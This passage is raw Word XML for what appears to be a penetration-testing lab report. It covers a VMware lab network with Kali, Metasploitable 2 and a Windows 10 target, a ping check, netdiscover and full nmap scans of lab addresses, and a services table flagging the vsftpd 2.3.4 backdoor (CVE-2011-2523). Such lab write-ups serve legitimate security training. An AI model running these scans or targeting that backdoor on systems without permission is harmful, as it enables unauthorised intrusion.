          <v:shape id="WS_Shape 231" type="Shape 231" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:5pt;mso-position-vertical-relative:paragraph;z-index:3841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2" coordorigin="11143,3558" coordsize="14,5104" o:spt="12" path="m11150,3558l11150,8662">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 232" type="Shape 232" style="position:absolute;left:0;text-align:left;margin-left:556.14pt;width:2.72pt;height:257.19pt;mso-position-horizontal-relative:page;margin-top:5pt;mso-position-vertical-relative:paragraph;z-index:-251657469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235.00pt;z-index:3911;mso-position-horizontal-relative:page;margin-top:4pt;mso-position-vertical-relative:paragraph;">
            <v:imagedata r:id="rId_dN8z" o:title="Image107"/>
          </v:shape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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="41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3" coordorigin="1095,8659" coordsize="10050,14" o:spt="12" path="m1095,8666l11145,8666">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 233" type="Shape 233" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:-4pt;mso-position-vertical-relative:paragraph;z-index:3849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8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2.2.3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Windows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4"/>
          <w:noProof/>
        </w:rPr>
        <w:t>10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(Internal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Target)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="0" w:line="255" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="334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One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adapter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assigned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VMnet3.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Static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IP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configured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via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Control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Panel.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default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gateway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points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-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ensure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-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traffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-9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routes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-9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correctly.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-1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Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"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Defender</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"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Firewall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"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-9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disabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-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on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all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profiles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allow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ICMP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="354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2" w:space="0" w:color="D0D7E3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802"/>
        <w:gridCol w:w="6562"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="437" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2802" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="161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91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8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IP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3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="6562" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="158"/>
              <w:jc w:val="left"/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10.10.10.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="441" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2802" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="161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49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7"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Default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2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22"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="6562" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1261"/>
              </w:tabs>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="158"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:color w:val="#222222"/>
                <w:spacing w:val="-5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10.10.10.5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0"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(Metasploitable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2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2 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internal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="434" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2802" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="161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04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DNS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Servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="6562" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="911"/>
                <w:tab w:val="left" w:pos="1089"/>
              </w:tabs>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="158"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:color w:val="#222222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8.8.8.8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2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>/</w:t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1"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:color w:val="#222222"/>
                <w:spacing w:val="-1"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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67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6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7" w:name="7"/>
    <w:bookmarkEnd w:id="7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90,1095" coordsize="10065,4239" o:spt="12" path="m1090,1095l11155,1095l11155,5334l1090,5334">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 57" type="Shape 57" style="position:absolute;left:0;text-align:left;margin-left:53.50pt;width:505.23pt;height:213.97pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:-251657496" filled="t" fillcolor="#F0FAFF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78,1080" coordsize="14,4249" o:spt="12" path="m1085,1080l1085,5329">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 58" type="Shape 58" style="position:absolute;left:0;text-align:left;margin-left:52.90pt;width:2.72pt;height:214.45pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3818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095,1078" coordsize="10050,14" o:spt="12" path="m1095,1085l11145,1085">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 59" type="Shape 59" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:7pt;mso-position-vertical-relative:paragraph;z-index:3820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1143,1080" coordsize="14,4249" o:spt="12" path="m11150,1080l11150,5329">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 60" type="Shape 60" style="position:absolute;left:0;text-align:left;margin-left:556.14pt;width:2.72pt;height:214.45pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:-251657490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192.00pt;z-index:3854;mso-position-horizontal-relative:page;margin-top:6pt;mso-position-vertical-relative:paragraph;">
            <v:imagedata r:id="rId_uCVT" o:title="Image110"/>
          </v:shape>
        </w:pict>
      </w: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095,5327" coordsize="10050,14" o:spt="12" path="m1095,5334l11145,5334">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 61" type="Shape 61" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:-1pt;mso-position-vertical-relative:paragraph;z-index:3828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6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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="259" w:after="0" w:line="25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9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2.3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Connectivity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Verification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9" coordorigin="1052,6376" coordsize="10141,10" o:spt="12" path="m1052,6381l11193,6381">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 89" type="Shape 89" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:25pt;mso-position-vertical-relative:paragraph;z-index:3832" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="115" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="476"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="-6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ICMP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echo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requests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were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sent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from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Kali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Linux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directly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internal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Windows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10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machine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confirm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end-to-end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routing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through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bridge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="337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2" coordorigin="1095,7356" coordsize="9363,2046" o:spt="12" path="m1095,7356l10458,7356l10458,9401l1095,9401">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 222" type="Shape 222" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:104.28pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:-251657479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5" coordorigin="1080,7356" coordsize="29,2046" o:spt="12" path="m1095,7356l1095,9401">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 515" type="Shape 515" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:104.28pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3842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6" coordorigin="1080,7346" coordsize="9373,10" o:spt="12" path="m1080,7351l10453,7351">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 516" type="Shape 516" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3843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7" coordorigin="10453,7346" coordsize="10,2055" o:spt="12" path="m10458,7346l10458,9401">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 517" type="Shape 517" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:104.76pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3846" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="837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ping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10.10.10.4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PING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10.10.10.4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(10.10.10.4)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56(84)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bytes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of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data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="0" w:line="215" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="3466"/>
        <w:jc w:val="both"/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64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bytes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from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10.10.10.4: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icmp_seq=1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ttl=127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time=1.04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ms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64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bytes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from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10.10.10.4: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icmp_seq=2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ttl=127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time=1.37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ms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64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bytes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from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10.10.10.4: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icmp_seq=3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ttl=127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time=1.78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ms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---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10.10.10.4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ping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statistics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---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3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packets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transmitted,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3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received,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0%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packet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loss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-100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8" coordorigin="1080,9401" coordsize="9373,10" o:spt="12" path="m1080,9406l10453,9406">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 518" type="Shape 518" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:-2pt;mso-position-vertical-relative:paragraph;z-index:3850" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D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351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7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8" w:name="8"/>
    <w:bookmarkEnd w:id="8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214" w:after="0" w:line="322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68"/>
          <w:noProof/>
        </w:rPr>
      </w:pP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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>3.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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Reconnaissance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9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38"/>
          <w:noProof/>
        </w:rPr>
        <w:t>&amp;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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Enumeration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5" coordorigin="1292,1450" coordsize="9901,19" o:spt="12" path="m1292,1460l11193,1460">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 85" type="Shape 85" style="position:absolute;left:0;text-align:left;margin-left:63.58pt;width:497.07pt;height:2.96pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3816" filled="f" stroked="t" strokeweight="0.96pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="341" w:after="0" w:line="25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8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3.1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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Network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8"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Discovery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" coordorigin="1052,2045" coordsize="10141,10" o:spt="12" path="m1052,2050l11193,2050">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 105" type="Shape 105" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:29pt;mso-position-vertical-relative:paragraph;z-index:3817" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="116" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="560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Initial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host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discovery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performed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using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="6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identify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live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hosts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external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subnet,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followed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by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full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port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scan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version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detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="116" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="560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341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3" coordorigin="1095,3025" coordsize="9363,1186" o:spt="12" path="m1095,3025l10458,3025l10458,4211l1095,4211">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 233" type="Shape 233" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:61.30pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:-251657494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3" coordorigin="1080,3025" coordsize="29,1186" o:spt="12" path="m1095,3025l1095,4211">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 313" type="Shape 313" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:61.30pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3823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4" coordorigin="1080,3015" coordsize="9373,10" o:spt="12" path="m1080,3020l10453,3020">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 314" type="Shape 314" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:382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5" coordorigin="10453,3015" coordsize="10,1196" o:spt="12" path="m10458,3015l10458,4211">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 315" type="Shape 315" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:61.78pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3827" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="192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root@kali:~#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="6559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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="#C678DD"/>
          <w:spacing w:val="1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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-r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192.168.50.0/24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nmap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-p-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-sV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-sC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-O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192.168.50.3</w:t>
      </w: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6" coordorigin="1080,4211" coordsize="9373,10" o:spt="12" path="m1080,4216l10453,4216">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 316" type="Shape 316" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3831" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w: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7" coordorigin="1090,4643" coordsize="10065,7389" o:spt="12" path="m1090,4643l11155,4643l11155,12032l1090,12032">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 317" type="Shape 317" style="position:absolute;left:0;text-align:left;margin-left:53.50pt;width:505.23pt;height:371.46pt;mso-position-horizontal-relative:page;margin-top:4pt;mso-position-vertical-relative:paragraph;z-index:-251657477" filled="t" fillcolor="#F0FAFF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8" coordorigin="1078,4633" coordsize="14,7399" o:spt="12" path="m1085,4633l1085,12032">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 318" type="Shape 318" style="position:absolute;left:0;text-align:left;margin-left:52.90pt;width:2.72pt;height:371.94pt;mso-position-horizontal-relative:page;margin-top:3pt;mso-position-vertical-relative:paragraph;z-index:3837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9" coordorigin="1095,4631" coordsize="10050,14" o:spt="12" path="m1095,4638l11145,4638">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 319" type="Shape 319" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:3pt;mso-position-vertical-relative:paragraph;z-index:3839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20" coordorigin="11143,4633" coordsize="14,7399" o:spt="12" path="m11150,4633l11150,12032">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 320" type="Shape 320" style="position:absolute;left:0;text-align:left;margin-left:556.14pt;width:2.72pt;height:371.94pt;mso-position-horizontal-relative:page;margin-top:3pt;mso-position-vertical-relative:paragraph;z-index:-251657471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350.00pt;z-index:3959;mso-position-horizontal-relative:page;margin-top:2pt;mso-position-vertical-relative:paragraph;">
            <v:imagedata r:id="rId_qRZv" o:title="Image113"/>
          </v:shape>
        </w:pict>
      </w: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0" w:after="0" w:line="26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21" coordorigin="1095,12030" coordsize="10050,14" o:spt="12" path="m1095,12037l11145,12037">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 321" type="Shape 321" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:9pt;mso-position-vertical-relative:paragraph;z-index:3847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390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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="259" w:after="0" w:line="25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4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3.2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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Key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Services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Identified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46" coordorigin="1052,12997" coordsize="10141,10" o:spt="12" path="m1052,13002l11193,13002">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 346" type="Shape 346" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:25pt;mso-position-vertical-relative:paragraph;z-index:3851" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="11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4A5568"/>
          <w:spacing w:val="2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32" w:space="0" w:color="1B3A5C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201"/>
        <w:gridCol w:w="1402"/>
        <w:gridCol w:w="3361"/>
        <w:gridCol w:w="3400"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="362" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1201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58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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1402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14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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:tcW w:w="3361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03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7"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Service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7"/>
                <w:noProof/>
              </w:rPr>
              <w:t>/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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
            </w:tcBorders>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="118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89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8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="568" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1201" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="52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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="52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FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:tcW w:w="3361" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="75" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="11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5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vsftpd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2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:sz="32" w:space="0" w:color="1B3A5C"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="3400" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="240" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="117" w:right="22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5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Known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7"/>
                <w:noProof/>
              </w:rPr>
              <w:t>backdoor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59"/>
                <w:noProof/>
              </w:rPr>
              <w:t>—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CVE-2011-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2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
